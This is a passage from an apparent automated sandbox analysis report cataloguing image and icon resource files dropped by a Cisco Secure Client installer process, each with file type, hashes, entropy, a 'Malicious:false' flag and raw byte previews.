                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\menu.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\mftogglebtn-down-solid.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\mftogglebtn-down.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\mftogglebtn.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\nac_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\nac_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\neutral.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\noncompliant.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\pinned.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\pinned_button.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\status_ico_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\status_ico_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\status_ico_good.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
